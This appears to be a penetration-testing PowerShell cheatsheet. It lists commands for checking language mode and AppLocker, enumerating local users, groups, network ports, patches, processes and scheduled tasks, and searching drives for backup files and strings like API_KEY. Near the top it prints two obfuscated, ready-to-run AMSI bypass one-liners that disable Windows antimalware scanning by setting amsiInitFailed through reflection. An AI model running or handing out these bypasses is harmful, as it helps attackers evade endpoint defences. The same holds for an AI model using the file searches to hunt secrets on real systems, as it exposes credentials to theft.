PowerShell Cheatsheet
Security Features
Language Mode
$ExecutionContext.SessionState.LanguageMode
AppLocker Policy
Get-AppLockerPolicy -Effective | Select -ExpandProperty RuleCollections
AMSI Bypasses
S`eT-It`em ( 'V'+'aR' + 'IA' + ('blE:1'+'q2') + ('uZ'+'x') ) ( [TYpE]( "{1}{0}"-F'F','rE' ) ) ; ( Get-varI`A`BLE ( ('1Q'+'2U') +'zX' ) -VaL )."A`ss`Embly"."GET`TY`Pe"(( "{6}{3}{1}{4}{2}{0}{5}" -f('Uti'+'l'),'A',('Am'+'si'),('.Man'+'age'+'men'+'t.'),('u'+'to'+'mation.'),'s',('Syst'+'em') ) )."g`etf`iElD"( ( "{0}{2}{1}" -f('a'+'msi'),'d',('I'+'nitF'+'aile') ),( "{2}{4}{0}{1}{3}" -f ('S'+'tat'),'i',('Non'+'Publ'+'i'),'c','c,' ))."sE`T`VaLUE"( ${n`ULl},${t`RuE} )
sET-ItEM ( 'V'+'aR' + 'IA' + 'blE:1q2' + 'uZx' ) ( [TYpE]( "{1}{0}"-F'F','rE' ) ) ; ( GeT-VariaBle ( "1Q2U" +"zX" ) -VaL )."A`ss`Embly"."GET`TY`Pe"(( "{6}{3}{1}{4}{2}{0}{5}" -f'Util','A','Amsi','.Management.','utomation.','s','System' ) )."g`etf`iElD"( ( "{0}{2}{1}" -f'amsi','d','InitFaile' ),( "{2}{4}{0}{1}{3}" -f 'Stat','i','NonPubli','c','c,' ))."sE`T`VaLUE"( ${n`ULl},${t`RuE} )
Users
Show Local Users
Get-LocalUser
Show Number of Local Users
Get-LocalUser | Measure-Object -line
Get User by providing SID
Get-LocalUser -SID "S-1-5-21-1394777289-3961777894-1791813945-501"
Show Usernames and SIDs
Get-LocalUser | Select-Object -Property Name,SID,Enabled
Show Users that Do not Require a Password
Get-LocalUser | Where-Object -Property PasswordRequired -Eq $False
Groups
Show Local Groups
Get-LocalGroup
Show Number of Local Groups
Get-LocalGroup | Measure-Object -line
Networks
Get Network Adapter and IP Address Information
Get-NetIPAddress
Show only IPv4 Addresses and Show Output in Table Format
Get-NetIPAddress -AddressFamily IPv4 | Format-Table
Get-NetIPAddress -AddressFamily IPv4 | ft
Show Listening Ports
Get-NetTCPConnection -State Listen
Computers & Files
Show Installed Patches
Get-HotFix
Show Information about Specific Patch
Get-HotFix -ID KB4023834
Search for Backup Files
Get-ChildItem -Path C:\ -Include *.bak* -File -Recurse -ErrorAction SilentlyContinue -Force
gci -Path C:\ -Include *.bak* -File -Recurse -ErrorAction SilentlyContinue -Force
ls -Path C:\ -Include *.bak* -File -Recurse -ErrorAction SilentlyContinue -Force
Search for Files Containing Specific String
Get-ChildItem C:\* -Recurse | Select-String -pattern API_KEY
Get Running Processes
Get-Process
Get All Scheduled Tasks
Get-ScheduledTask
Get Information about Specific Scheduled Task
Get-ScheduledTask -TaskName "new-sched-task"
Show Owner of File/Folder
Get-ACL C:\
Last updated